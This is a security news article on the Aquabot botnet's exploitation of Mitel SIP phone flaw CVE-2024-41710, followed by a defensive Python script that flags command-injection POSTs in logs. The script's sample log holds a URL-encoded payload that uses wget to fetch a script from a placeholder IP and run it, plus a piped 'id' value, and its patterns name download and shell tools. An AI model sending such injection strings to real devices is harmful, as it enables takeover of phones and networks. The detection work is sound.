Aquabot Botnet Exploits Mitel Phone Flaws for DDoS Attacks

The Aquabot botnet has started exploiting a vulnerability in Mitel SIP phones to launch DDoS attacks, according to a recent report. The Mirai-based malware targets CVE-2024-41710, a high-severity command injection flaw affecting multiple Mitel phone series.

Mitel released firmware updates to patch the flaw in July 2024. The vulnerability allows an authenticated attacker with administrative access to inject commands that are executed during the device's boot process. Successful exploitation gives the attacker arbitrary command execution on the phone, compromising the device itself and exposing the network it sits on. Because exploitation requires administrator credentials, a management interface reachable by attackers and protected only by default or weak passwords is what makes the flaw usable in practice.

How Hackers Are Exploiting the Flaw

In August 2024, a researcher published proof-of-concept (PoC) code showing how a crafted HTTP POST request to the phone's web interface could bypass its input filtering and write attacker-controlled data into a configuration file. Because the phone reads that file when it boots, the injected content is executed as a script at startup.

By January 2025, security researchers were observing in-the-wild attacks using this exploit. The observed payload closely matched the PoC code: the injected command downloaded and executed a shell script, which then installed the Aquabot malware on the vulnerable Mitel SIP phones.

Once infected, the devices connect to a command-and-control (C&C) server, which lets the operators monitor bot health and direct DDoS attacks.

Other Devices Targeted by Aquabot

Aquabot is not limited to Mitel phones. Its operators have also targeted vulnerabilities in Hadoop YARN, the Roxy-WI web interface, and routers from Linksys, Teltonika, Dasan GPON, and LB-LINK.

In addition, just weeks before the attacks on CVE-2024-41710 surfaced, the US cybersecurity agency CISA warned that two other critical Mitel vulnerabilities were being exploited in the wild.

How to Prevent Aquabot Infections

Organizations should apply the Mitel firmware updates immediately, and patch the other device classes Aquabot targets. Because CVE-2024-41710 requires administrator credentials, changing default passwords, limiting who holds admin access on the phones, and keeping the phones' management web interface off the internet remove the precondition for exploitation. Monitoring network traffic for unusual activity, such as phones fetching files over HTTP or connecting to hosts they have no business reaching, can reveal infections early. Blocking known malicious IPs and filtering unauthorized traffic with a firewall limits both the initial exploitation attempts and the C&C communication that follows.
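The exploitation chain described above (a crafted HTTP POST carrying shell commands that download and run a script) is something a defender can look for in the request logs of whatever proxy or WAF fronts the phones' management interface. The following detection script is an added example, not code from the report or from Mitel, and it is deliberately generic: it does not know the real vulnerable endpoint or parameter. It assumes a constructed pipe-delimited log format `<timestamp>|<src_ip>|<method>|<path>|<url-encoded body>` with made-up paths, parameter names and IP addresses, decodes each POST body as form fields, and flags fields containing shell separators, download tools, or an execute step. A field that both fetches a payload and executes it is scored "high", which is the Mirai-style dropper pattern the article describes.

```python
"""Flag HTTP POSTs to a phone admin interface whose form fields look like shell
command injection.  Example detection logic; the log format, endpoint paths,
parameter names and addresses below are constructed for illustration and are
not taken from the Mitel advisory or the Aquabot report."""
from __future__ import annotations

import re
from urllib.parse import parse_qsl

# Indicator classes: command separators, download tooling typical of IoT
# droppers, and an execution step (invoking a shell or chmod +x).
INJECTION_PATTERNS = {
    "separator": re.compile(r"[;&|]|\$\(|`"),
    "download": re.compile(r"\b(?:wget|curl|tftp|ftpget)\b"),
    "execute": re.compile(r"(?:^|[;&|\s])(?:sh|bash|/bin/sh)\b|\bchmod\s+\+?x\b"),
}


def suspicious_params(body: str) -> dict[str, list[str]]:
    """Return {field: [indicator names]} for decoded form fields that match."""
    hits: dict[str, list[str]] = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        matched = [tag for tag, rx in INJECTION_PATTERNS.items() if rx.search(value)]
        if matched:
            hits[name] = matched
    return hits


def is_download_and_execute(indicators: dict[str, list[str]]) -> bool:
    """True when one field both fetches a payload and runs it: the
    'download a script, then execute it' chain seen in the attacks."""
    return any({"download", "execute"} <= set(tags) for tags in indicators.values())


def parse_line(line: str) -> dict[str, str] | None:
    """Parse the constructed log format; return None for malformed lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    ts, src, method, path, body = parts
    return {"ts": ts, "src": src, "method": method, "path": path, "body": body}


def scan_log(lines) -> list[dict]:
    """One finding per POST whose body carries injection indicators."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        hits = suspicious_params(rec["body"])
        if not hits:
            continue
        findings.append({
            "ts": rec["ts"],
            "src": rec["src"],
            "path": rec["path"],
            "params": hits,
            "severity": "high" if is_download_and_execute(hits) else "medium",
        })
    return findings


# Constructed sample traffic (not real data): a benign config save, a GET, an
# injection attempt chaining wget with sh, and an attempt with a lone pipe.
SAMPLE_LOG = [
    "2025-01-20T10:00:01Z|10.0.0.5|POST|/config.html|hostname=phone-101&ntp=10.0.0.1",
    "2025-01-20T10:00:02Z|10.0.0.5|GET|/status.html|",
    "2025-01-20T10:01:15Z|198.51.100.7|POST|/config.html|"
    "hostname=x%3Bwget+http%3A%2F%2F203.0.113.9%2Fa.sh+-O+%2Ftmp%2Fa.sh%3Bsh+%2Ftmp%2Fa.sh",
    "2025-01-20T10:02:00Z|198.51.100.7|POST|/config.html|ntp=10.0.0.1%7Cid",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["severity"].upper(), finding["ts"], finding["src"],
              finding["path"], finding["params"])
```

Run against the constructed sample, the script reports the wget-plus-sh request as high severity and the lone `|id` request as medium, while the ordinary configuration save passes. In a real deployment the source IP of a high-severity hit is also the address to feed into the firewall block list mentioned above, and the phone that received it should be treated as compromised until re-flashed with patched firmware.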